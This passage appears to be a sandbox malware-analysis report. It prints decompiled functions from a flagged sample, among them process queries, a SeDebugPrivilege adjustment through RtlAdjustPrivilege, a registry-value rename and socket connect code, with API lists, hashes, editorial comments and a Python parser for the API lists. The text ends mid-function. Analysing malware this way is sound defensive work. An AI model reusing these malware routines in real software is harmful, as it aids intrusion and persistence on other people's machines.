                                                                                     				_t32 = (_t30 & 0xfffffff8) - 0x20;	// 8-byte aligned frame
                                                                                     				_t6 =  *0x4f03008; // 0x3d21fb31
                                                                                     				_v8 = _t6 ^ (_t30 & 0xfffffff8) - 0x00000020;	// /GS stack cookie
                                                                                     				_t23 = OpenProcess(0x400, 0, GetCurrentProcessId());	// 0x400 = PROCESS_QUERY_INFORMATION
                                                                                     				if(_t23 != 0) {
                                                                                     					_t11 = GetProcAddress(GetModuleHandleW(L"ntdll"), "NtQueryInformationProcess");	// resolved at run time, no import entry
                                                                                     					if(_t11 != 0) {
                                                                                     						 *_t11(_t23, 0,  &_v32, 0x18, 0);	// ProcessBasicInformation; ReturnLength not requested
                                                                                     						_t27 =  ==  ? _v32 : 0;	// result kept only if the comparison (operand lost by the decompiler) succeeds
                                                                                     					}
                                                                                     					CloseHandle(_t23);
                                                                                     					return E04ED572E(_v8 ^ _t32);	// cookie check
                                                                                     				} else {
                                                                                     					return E04ED572E(_v8 ^ _t32);
                                                                                     				}
                                                                                     			}

                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D18
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D25
                                                                                    • GetModuleHandleW.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D4C
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC5D53
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,04EC6FAC,00000000,74E04DC0), ref: 04EC5D73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: HandleProcess$AddressCloseCurrentModuleOpenProc
                                                                                    • String ID: NtQueryInformationProcess$ntdll
                                                                                    • API String ID: 2704359807-2585995557
                                                                                    • Opcode ID: f2db294b64dc9af3de3383bd543212aa32c2d321ee6e2af97f7fa157df30ae3a
                                                                                    • Instruction ID: 5f8360809f9eb1e07029a4f53731b37d4d7f6e7d788388246992de125944ecd8
                                                                                    • Opcode Fuzzy Hash: f2db294b64dc9af3de3383bd543212aa32c2d321ee6e2af97f7fa157df30ae3a
                                                                                    • Instruction Fuzzy Hash: E401D8323003056BD310AF66AC0AB3B77A9EFC8616F00451DFE59D7180DE64ED0187D6
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 38%
                                                                                    			E04EC4160(void* __ebx, char _a4) {
                                                                                    				void* __ecx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				char _t7;
                                                                                    				_Unknown_base(*)()* _t10;
                                                                                    				int _t14;
                                                                                    				void* _t18;
                                                                                    				char* _t19;
                                                                                    				void* _t21;
                                                                                    				void* _t22;
                                                                                    				void* _t23;
                                                                                    				intOrPtr* _t24;
                                                                                    
                                                                                    				_t18 = __ebx;
                                                                                    				_t7 = _a4;
                                                                                    				_t24 = _t19;
                                                                                    				 *_t24 = 0x4efd8b0;
                                                                                    				 *((intOrPtr*)(_t24 + 4)) = _t7;
                                                                                    				 *((intOrPtr*)(_t7 + 0x38)) = _t24;
                                                                                    				 *((intOrPtr*)(_t24 + 8)) = CreateEventW(0, 1, 0, 0);
                                                                                    				 *_t24 = 0x4efde4c;
                                                                                    				_t10 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlAdjustPrivilege");
                                                                                    				if(_t10 == 0) {
                                                                                    					E04ECAA70(_t24);
                                                                                    				} else {
                                                                                    					_t19 =  &_a4;
                                                                                    					 *_t10(0x14, 1, 0, _t19);
                                                                                    				}
                                                                                    				_t23 = E04EC4BC0(_t18, _t21, _t22, _t24);
                                                                                    				if(_t23 != 0) {
                                                                                    					_t14 = LocalSize(_t23);
                                                                                    					_push(_t19);
                                                                                    					_push(0x3f);
                                                                                    					_push(_t14);
                                                                                    					_push(_t23);
                                                                                    					E04EB1C60( *((intOrPtr*)(_t24 + 4)));
                                                                                    					LocalFree(_t23);
                                                                                    				}
                                                                                    				return _t24;
                                                                                    			}

                                                                                    APIs
                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,04EB9CBC,?,Function_000568D8,00000000), ref: 04EC417F
                                                                                    • LoadLibraryA.KERNEL32(ntdll.dll,?,?,?,?,04EB9CBC,?,Function_000568D8,00000000), ref: 04EC4193
                                                                                    • GetProcAddress.KERNEL32(00000000,RtlAdjustPrivilege), ref: 04EC419F
                                                                                    • LocalSize.KERNEL32 ref: 04EC41C8
                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,0000003F,?,?,?,?,?,04EB9CBC,?,Function_000568D8,00000000), ref: 04EC41DC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Local$AddressCreateEventFreeLibraryLoadProcSize
                                                                                    • String ID: RtlAdjustPrivilege$ntdll.dll
                                                                                    • API String ID: 3057455304-64178277
                                                                                    • Opcode ID: 8d75aaca56e0cf7822787a05dfc10afd1d13e0b8e11662e066031f0e63018d34
                                                                                    • Instruction ID: adb3f3c93fb5df75358e03c79d6b60395fc4d619a05caba62cc5226d95b58e51
                                                                                    • Opcode Fuzzy Hash: 8d75aaca56e0cf7822787a05dfc10afd1d13e0b8e11662e066031f0e63018d34
                                                                                    • Instruction Fuzzy Hash: 8601F1752403007FE2249FA59C5AFBB7AA8EB84B41F10111DF7568B1C0EEB0B8008BA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 37%
                                                                                    			E04EC5980(void* __ecx) {
                                                                                    				char _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				char _v44;
                                                                                    				_Unknown_base(*)()* _t10;
                                                                                    				intOrPtr _t13;
                                                                                    				_Unknown_base(*)()* _t15;
                                                                                    				void* _t19;
                                                                                    
                                                                                    				_t19 = __ecx;
                                                                                    				_t10 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
                                                                                    				if(_t10 == 0) {
                                                                                    					L6:
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					asm("xorps xmm0, xmm0");
                                                                                    					_v12 = 0;
                                                                                    					asm("movups [ebp-0x28], xmm0");
                                                                                    					asm("movups [ebp-0x18], xmm0");
                                                                                    					 *_t10( &_v44);
                                                                                    					_t13 = _v44;
                                                                                    					if(_t13 == 6 || _t13 == 9) {
                                                                                    						_v8 = 0;
                                                                                    						_t15 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                                                    						if(_t15 != 0) {
                                                                                    							 *_t15(_t19,  &_v8);
                                                                                    						}
                                                                                    						return 0 | _v8 == 0x00000000;
                                                                                    					} else {
                                                                                    						goto L6;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,00000000,?,?,?,?,?,?,?,?,?,04EC5AA3,?,?,00000000), ref: 04EC5993
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC599A
                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 04EC59DC
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 04EC59E3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressLibraryLoadProc
                                                                                    • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                                                                    • API String ID: 2574300362-3073145729
                                                                                    • Opcode ID: 9539a7145d51efcb6f82792707973436b4fef51f7b54f30bb42408bdc3b618fe
                                                                                    • Instruction ID: 034cb19cd0edeaae206d91620bac842548ec9f456cdac64f0c260b43cb6b053e
                                                                                    • Opcode Fuzzy Hash: 9539a7145d51efcb6f82792707973436b4fef51f7b54f30bb42408bdc3b618fe
                                                                                    • Instruction Fuzzy Hash: AD01F732E51309ABCB14DFF19D88AFE7B78DB58215F046259E91AE2000EA78B981C750
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 70%
                                                                                    			E04ED1820(intOrPtr __ecx, intOrPtr* _a4, signed char _a7) {
                                                                                    				intOrPtr _v8;
                                                                                    				intOrPtr _v12;
                                                                                    				intOrPtr* _t36;
                                                                                    				intOrPtr _t38;
                                                                                    				void* _t43;
                                                                                    				long _t48;
                                                                                    				intOrPtr _t51;
                                                                                    				intOrPtr _t56;
                                                                                    				signed char _t63;
                                                                                    				intOrPtr _t66;
                                                                                    				struct _CRITICAL_SECTION* _t75;
                                                                                    
                                                                                    				_t36 = _a4;
                                                                                    				_t51 = __ecx;
                                                                                    				_t63 =  *((intOrPtr*)(_t36 + 2));
                                                                                    				_t66 =  *((intOrPtr*)(_t36 + 8));
                                                                                    				_v8 =  *((intOrPtr*)(_t36 + 4));
                                                                                    				_v12 = __ecx;
                                                                                    				_a7 = _t63;
                                                                                    				if( *_t36 != 0xbb4f || _t63 != 1 || (_t63 & 0x000000fe) != 0) {
                                                                                    					__imp__#112(0xd);
                                                                                    					return 2;
                                                                                    				} else {
                                                                                    					_t75 = __ecx + 0x28;
                                                                                    					EnterCriticalSection(_t75);
                                                                                    					_t38 =  *((intOrPtr*)(_t51 + 0x24));
                                                                                    					if(_t38 != 0) {
                                                                                    						if(_t38 != 2) {
                                                                                    							_t56 =  *((intOrPtr*)(_t51 + 0x20));
                                                                                    							if(_t56 != 0) {
                                                                                    								if(_v8 != _t56) {
                                                                                    									goto L21;
                                                                                    								} else {
                                                                                    									goto L18;
                                                                                    								}
                                                                                    							} else {
                                                                                    								 *((intOrPtr*)(_t51 + 0x20)) = _v8;
                                                                                    								 *((intOrPtr*)(_t51 + 0x10)) = timeGetTime();
                                                                                    								 *((intOrPtr*)(_t51 + 0x14)) = 0;
                                                                                    								L18:
                                                                                    								if(_t66 !=  *((intOrPtr*)(_t51 + 0x1c))) {
                                                                                    									if(_t66 == 0) {
                                                                                    										goto L11;
                                                                                    									} else {
                                                                                    										goto L21;
                                                                                    									}
                                                                                    								} else {
                                                                                    									 *((intOrPtr*)(_t51 + 0x24)) = 2;
                                                                                    									asm("sbb edi, edi");
                                                                                    									_t43 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t51 + 4)) + 4)) + 0x9c))( ~( *(_t51 + 8)) &  *(_t51 + 8) + 0x00000004);
                                                                                    									LeaveCriticalSection(_t75);
                                                                                    									return _t43;
                                                                                    								}
                                                                                    							}
                                                                                    						} else {
                                                                                    							if(_v8 !=  *((intOrPtr*)(_t51 + 0x20))) {
                                                                                    								L21:
                                                                                    								_push(0x2746);
                                                                                    								goto L22;
                                                                                    							} else {
                                                                                    								if(_t66 ==  *((intOrPtr*)(_t51 + 0x1c))) {
                                                                                    									L11:
                                                                                    									LeaveCriticalSection(_t75);
                                                                                    									if( *((intOrPtr*)(_t51 + 0xc)) == 0 && _a7 == 1) {
                                                                                    										 *((intOrPtr*)(_t51 + 0xc)) = 1;
                                                                                    									}
                                                                                    									E04ED1A20(_t51);
                                                                                    									return 0;
                                                                                    								} else {
                                                                                    									if(_t66 != 0) {
                                                                                    										goto L21;
                                                                                    									} else {
                                                                                    										_t48 = timeGetTime();
                                                                                    										if(_t48 -  *((intOrPtr*)(_t51 + 0x18)) >  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))) + 0x54))() + _t49) {
                                                                                    											goto L21;
                                                                                    										} else {
                                                                                    											_t51 = _v12;
                                                                                    											goto L11;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						_push(0x139f);
                                                                                    						L22:
                                                                                    						__imp__#112();
                                                                                    						LeaveCriticalSection(_t75);
                                                                                    						return 2;
                                                                                    					}
                                                                                    				}
                                                                                    			}

                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(?,?), ref: 04ED1867
                                                                                    • timeGetTime.WINMM ref: 04ED189F
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED18C2
                                                                                    • WSASetLastError.WS2_32(00002746), ref: 04ED1959
                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 04ED1965
                                                                                    • WSASetLastError.WS2_32(0000000D), ref: 04ED1978
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$ErrorLastLeave$EnterTimetime
                                                                                    • String ID:
                                                                                    • API String ID: 1279346950-0
                                                                                    • Opcode ID: 4b007436e140c8a220e7c9c1181f9089ae24caf127754bd5730a066d7e7b0a15
                                                                                    • Instruction ID: 940fc27847f0c5288c19583c6ba152b2a1e6cbad37763a43decb7368417d2881
                                                                                    • Opcode Fuzzy Hash: 4b007436e140c8a220e7c9c1181f9089ae24caf127754bd5730a066d7e7b0a15
                                                                                    • Instruction Fuzzy Hash: D441E2766002009FDF10CF69D4847A9F7A5EF88325F1091AAEC09DB24ED735E846CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 88%
                                                                                    			E04EB4670(void* __ecx, void* __eflags, WCHAR* _a4) {
                                                                                    				signed char _t21;
                                                                                    				signed int _t27;
                                                                                    				signed int _t28;
                                                                                    				WCHAR* _t30;
                                                                                    				void* _t37;
                                                                                    				WCHAR* _t38;
                                                                                    				signed int _t39;
                                                                                    				WCHAR* _t40;
                                                                                    				WCHAR* _t41;
                                                                                    				WCHAR* _t42;
                                                                                    
                                                                                    				_t37 = __ecx;
                                                                                    				_t41 = _a4;
                                                                                    				_push(2 + lstrlenW(_t41) * 2);
                                                                                    				_t40 = E04EDEBA9(_t37);
                                                                                    				if(_t40 != 0) {
                                                                                    					lstrcpyW(_t40, _t41);
                                                                                    					_t42 = _t40;
                                                                                    					if( *_t40 != 0x5c || _t40[1] != 0x5c) {
                                                                                    						if(_t40[1] == 0x3a) {
                                                                                    							_t27 = _t40[2] & 0x0000ffff;
                                                                                    							_t11 =  &(_t40[2]); // 0x4
                                                                                    							_t42 = _t11;
                                                                                    							if(_t27 != 0 && _t27 == 0x5c) {
                                                                                    								_t42 =  &(_t42[1]);
                                                                                    							}
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t28 = _t40[2] & 0x0000ffff;
                                                                                    						_t6 =  &(_t40[2]); // 0x4
                                                                                    						_t38 = _t6;
                                                                                    						if(_t28 != 0) {
                                                                                    							while(_t28 != 0x5c) {
                                                                                    								_t38 = CharNextW(_t38);
                                                                                    								_t28 =  *_t38 & 0x0000ffff;
                                                                                    								if(_t28 != 0) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								goto L7;
                                                                                    							}
                                                                                    						}
                                                                                    						L7:
                                                                                    						_t7 =  &(_t38[1]); // 0x2
                                                                                    						_t30 =  ==  ? _t38 : _t7;
                                                                                    						if( *_t30 != 0) {
                                                                                    							_t39 =  *_t30 & 0x0000ffff;
                                                                                    							while(_t39 != 0x5c) {
                                                                                    								_t30 = CharNextW(_t30);
                                                                                    								_t39 =  *_t30 & 0x0000ffff;
                                                                                    								if(_t39 != 0) {
                                                                                    									continue;
                                                                                    								}
                                                                                    								goto L11;
                                                                                    							}
                                                                                    						}
                                                                                    						L11:
                                                                                    						_t8 =  &(_t30[1]); // 0x2
                                                                                    						_t42 =  ==  ? _t30 : _t8;
                                                                                    					}
                                                                                    					if( *_t42 == 0) {
                                                                                    						L26:
                                                                                    						E04EDE947(_t40);
                                                                                    						return 1;
                                                                                    					} else {
                                                                                    						do {
                                                                                    							if( *_t42 != 0x5c) {
                                                                                    								goto L25;
                                                                                    							} else {
                                                                                    								 *_t42 = 0;
                                                                                    								_t21 = GetFileAttributesW(_t40);
                                                                                    								if(_t21 != 0xffffffff) {
                                                                                    									if((_t21 & 0x00000010) == 0) {
                                                                                    										goto L22;
                                                                                    									} else {
                                                                                    										goto L24;
                                                                                    									}
                                                                                    								} else {
                                                                                    									if(CreateDirectoryW(_t40, 0) != 0 || GetLastError() == 0xb7) {
                                                                                    										L24:
                                                                                    										 *_t42 = 0x5c;
                                                                                    										goto L25;
                                                                                    									} else {
                                                                                    										L22:
                                                                                    										E04EDE947(_t40);
                                                                                    										return 0;
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    							goto L27;
                                                                                    							L25:
                                                                                    							_t42 = CharNextW(_t42);
                                                                                    						} while ( *_t42 != 0);
                                                                                    						goto L26;
                                                                                    					}
                                                                                    				} else {
                                                                                    					return 0;
                                                                                    				}
                                                                                    				L27:
                                                                                    			}

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,04EB572D,?,?,?,?), ref: 04EB4679
                                                                                    • lstrcpyW.KERNEL32 ref: 04EB46A0
                                                                                    • CharNextW.USER32(00000004), ref: 04EB46CE
                                                                                    • CharNextW.USER32(00000006), ref: 04EB46F7
                                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 04EB473C
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 04EB474A
                                                                                    • GetLastError.KERNEL32 ref: 04EB4754
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CharNext$AttributesCreateDirectoryErrorFileLastlstrcpylstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 227312388-0
                                                                                    • Opcode ID: fadc5f7bc5bd2932d39c0e3e9aba1adc40c3f5677547804b5a792cbafac6fc54
                                                                                    • Instruction ID: cf951470695312ee83ddaca977e8144f91117901c836dd7f397d2ff3683c7fb5
                                                                                    • Opcode Fuzzy Hash: fadc5f7bc5bd2932d39c0e3e9aba1adc40c3f5677547804b5a792cbafac6fc54
                                                                                    • Instruction Fuzzy Hash: C43105319002229ADF206F65A844AF7B3F8FF82769B40512AEDD4970D1E775B881C7E1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			// Renames a registry value: the data of value _a4 under key __edx (relative to the root
                                                                                    			// handle __ecx) is written back under the name _a8 and the original value is deleted.
                                                                                    			// Returns 1 on success, 0 otherwise. The comments are editorial annotations of the
                                                                                    			// decompiler output; the statements themselves are unchanged.
                                                                                    			E04EC0A40(void* __ebx, void* __ecx, short* __edx, short* _a4, short* _a8) {
                                                                                    				void* _v8;      // HKEY opened below
                                                                                    				int _v12;       // cbData of the source value
                                                                                    				int _v16;       // dwType of the source value
                                                                                    				void* __esi;
                                                                                    				int* _t25;
                                                                                    				void* _t26;
                                                                                    				int _t34;
                                                                                    				int _t37;
                                                                                    				long _t39;
                                                                                    				char* _t41;
                                                                                    				short* _t43;
                                                                                    				int* _t47;      // return value
                                                                                    				void* _t49;
                                                                                    
                                                                                    				_t45 = __ecx;
                                                                                    				_v8 = 0;
                                                                                    				_t47 = 0;
                                                                                    				_v16 = 0;
                                                                                    				_v12 = 0;
                                                                                    				_t48 = 0;       // buffer for the value data, released at L11
                                                                                    				// 0x103 = KEY_QUERY_VALUE | KEY_SET_VALUE | KEY_WOW64_64KEY: the 64-bit registry view is addressed explicitly
                                                                                    				_t25 = RegOpenKeyExW(__ecx, __edx, 0, 0x103,  &_v8);
                                                                                    				if(_t25 != 0) {
                                                                                    					L11:        // common exit: close the key, free the data buffer
                                                                                    					_t26 = _v8;
                                                                                    					if(_t26 != 0) {
                                                                                    						RegCloseKey(_t26);
                                                                                    					}
                                                                                    					if(_t48 != 0) {
                                                                                    						E04ED573F(_t48);
                                                                                    					}
                                                                                    					return _t47;
                                                                                    				}
                                                                                    				_t43 = _a8;
                                                                                    				// Continue only if the destination value does not exist yet (return 2 = ERROR_FILE_NOT_FOUND;
                                                                                    				// _t25 is 0 here, so every output pointer of the first query is NULL) and the type and
                                                                                    				// size of the source value can be read.
                                                                                    				if(RegQueryValueExW(_v8, _t43, _t25, _t25, _t25, _t25) != 2 || RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
                                                                                    					L10:
                                                                                    					goto L11;
                                                                                    				} else {
                                                                                    					_t34 = _v12;
                                                                                    					_t54 = _t34;
                                                                                    					if(_t34 != 0) {
                                                                                    						_push(_t34);
                                                                                    						_t41 = E04ED5785(_t45, 0, _t54);   // allocates _v12 bytes (by use; E04ED573F at L11 is the matching release)
                                                                                    						_t49 = _t49 + 4;
                                                                                    						_t48 = _t41;
                                                                                    					}
                                                                                    					// Read the data, store it under the new name with the same type, then drop the old value.
                                                                                    					_t37 = RegQueryValueExW(_v8, _a4, 0,  &_v16, _t48,  &_v12);
                                                                                    					if(_t37 == 0 && RegSetValueExW(_v8, _t43, _t37, _v16, _t48, _v12) == 0) {
                                                                                    						_t39 = RegDeleteValueW(_v8, _a4);
                                                                                    						if(_t39 != 0) {
                                                                                    							RegDeleteValueW(_v8, _t43);   // rollback: the original could not be removed, so remove the copy
                                                                                    						} else {
                                                                                    							_t21 = _t39 + 1; // 0x1
                                                                                    							_t47 = _t21;     // success
                                                                                    						}
                                                                                    					}
                                                                                    					goto L10;
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000103,?), ref: 04EC0A6D
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0A87
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0AA2
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0ACF
                                                                                    • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0AE5
                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0AF5
                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0B08
                                                                                    • RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000103,?), ref: 04EC0B17
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, Offset: 04EB0000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Value$Query$Delete$CloseOpen
                                                                                    • String ID:
                                                                                    • API String ID: 2816288289-0
                                                                                    • Opcode ID: abf18d4d8570c7e156053eaa3da55e2444bf882862c8d79f113d16d1275b858b
                                                                                    • Instruction ID: fe23e4224b300c0bbb261a6b699ac9d438747bd2f351a32f2ec51c5a93a23c73
                                                                                    • Opcode Fuzzy Hash: abf18d4d8570c7e156053eaa3da55e2444bf882862c8d79f113d16d1275b858b
                                                                                    • Instruction Fuzzy Hash: F7311AB1A00108FBEB209FA1DE48EAEBBBDEB44649F104069FD15E2010D735AF55DB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
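The APIs lists in this report are the fastest handle on what a function does. The Python below is an added editorial example, not part of the Joe Sandbox report and not code from the sample: it parses the `• Name.Module(args), ref: ADDR` lines, decodes the samDesired mask passed to RegOpenKeyExW, and tags ordered API subsequences, so the RegQueryValueExW, RegSetValueExW, RegDeleteValueW order of E04EC0A40 comes out as a registry-value rename and the WSAEventSelect, connect, WSAGetLastError order of E04ECECF0 as an event-driven connect. The sample inputs are the two APIs lists copied from this report; the behaviour labels, the `ApiCall` type and the tolerance for bullet and whitespace variants are this example's own assumptions.

```python
import re
from dataclasses import dataclass

# One "• Name.Module(args), ref: ADDR" line of a Joe Sandbox "APIs" list. Lines without an
# argument list ("GetLastError.KERNEL32 ref: 04EB4754") are accepted as well.
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>[A-Za-z_][\w@#]*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple   # ints, or None where the report prints '?' (argument not recovered)
    ref: int      # address of the call site

def _parse_arg(tok):
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)

def parse_api_lines(text):
    """Return an ApiCall for every parsable line, in the report's order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue                      # "APIs" header, blank lines, anything else
        raw = m.group("args")
        args = tuple(_parse_arg(t) for t in raw.split(",")) if raw else ()
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls

# samDesired bits of RegOpenKeyExW (KEY_* specific rights). Standard rights such as
# READ_CONTROL (0x20000) are reported as a hex remainder.
KEY_ACCESS = {
    0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
    0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
    0x100: "KEY_WOW64_64KEY", 0x200: "KEY_WOW64_32KEY",
}

def decode_key_access(mask):
    names = [name for bit, name in KEY_ACCESS.items() if mask & bit]
    rest = mask & ~sum(KEY_ACCESS)
    if rest:
        names.append(hex(rest))
    return names

# Behaviours as ordered API subsequences. The labels are this example's own.
BEHAVIOURS = {
    "registry_value_rename": ("RegQueryValueExW", "RegSetValueExW", "RegDeleteValueW"),
    "event_driven_connect": ("WSAEventSelect", "connect", "WSAGetLastError"),
}

def _is_subsequence(pattern, names):
    it = iter(names)                      # shared iterator: each pattern element has to
    return all(any(n == p for n in it) for p in pattern)   # occur after the previous one

def tag_behaviours(calls):
    names = [c.api for c in calls]
    return sorted(tag for tag, pat in BEHAVIOURS.items() if _is_subsequence(pat, names))

def analyse(text):
    calls = parse_api_lines(text)
    access = [decode_key_access(c.args[3]) for c in calls
              if c.api == "RegOpenKeyExW" and len(c.args) > 3 and c.args[3] is not None]
    return {"calls": len(calls), "behaviours": tag_behaviours(calls), "key_access": access}

# Sample input: the APIs lists of E04EC0A40 and E04ECECF0 as printed in this report.
REGISTRY_APIS = """\
APIs
• RegOpenKeyExW.ADVAPI32(?,?,00000000,00000103,?), ref: 04EC0A6D
• RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0A87
• RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0AA2
• RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0ACF
• RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0AE5
• RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0AF5
• RegDeleteValueW.ADVAPI32(00000000,00000000,?,?,?,00000000,00000103,?), ref: 04EC0B08
• RegCloseKey.ADVAPI32(00000000,?,?,00000000,00000103,?), ref: 04EC0B17
"""
SOCKET_APIS = """\
• WSAEventSelect.WS2_32(?,?,00000030), ref: 04ECED04
• connect.WS2_32(?,?,00000010), ref: 04ECED2C
• WSAGetLastError.WS2_32 ref: 04ECED3F
• connect.WS2_32(?,?,00000010), ref: 04ECED6F
• WSAEventSelect.WS2_32(?,?,00000023), ref: 04ECED82
• SetLastError.KERNEL32(00000000), ref: 04ECED9D
• GetLastError.KERNEL32 ref: 04ECEDAF
• WSASetLastError.WS2_32(00000000), ref: 04ECEDC0
"""

if __name__ == "__main__":
    for name, text in (("E04EC0A40", REGISTRY_APIS), ("E04ECECF0", SOCKET_APIS)):
        print(name, analyse(text))
```

Subsequence matching rather than exact sequence matching is deliberate: the report lists call sites in control-flow order, and a function usually has more calls than the three or four that characterise the behaviour.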

                                                                                    C-Code - Quality: 16%
                                                                                    			// Connects the socket at this+0x1c (its event object is at this+0x20) to the address
                                                                                    			// _a4. _a8 selects the mode: non-zero = asynchronous connect whose completion is
                                                                                    			// signalled through FD_CONNECT; zero = connect, then switch the event to
                                                                                    			// read/write/close and run the virtual handler at vtable+0x7c. Returns 1 on success,
                                                                                    			// 0 on failure. WS2_32 ordinals: #4 = connect, #111 = WSAGetLastError,
                                                                                    			// #112 = WSASetLastError (see the APIs list below). The "!= ? 0x1c : 0x10" ternaries
                                                                                    			// are a decompiler artifact: the lost condition selects the address length,
                                                                                    			// sizeof(sockaddr_in6) = 0x1c or sizeof(sockaddr_in) = 0x10. The comments are
                                                                                    			// editorial annotations; the statements are unchanged.
                                                                                    			E04ECECF0(void* __eax, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                    				intOrPtr _t14;
                                                                                    				long _t19;
                                                                                    				intOrPtr _t21;
                                                                                    				intOrPtr* _t31;
                                                                                    
                                                                                    				_t31 = __ecx;
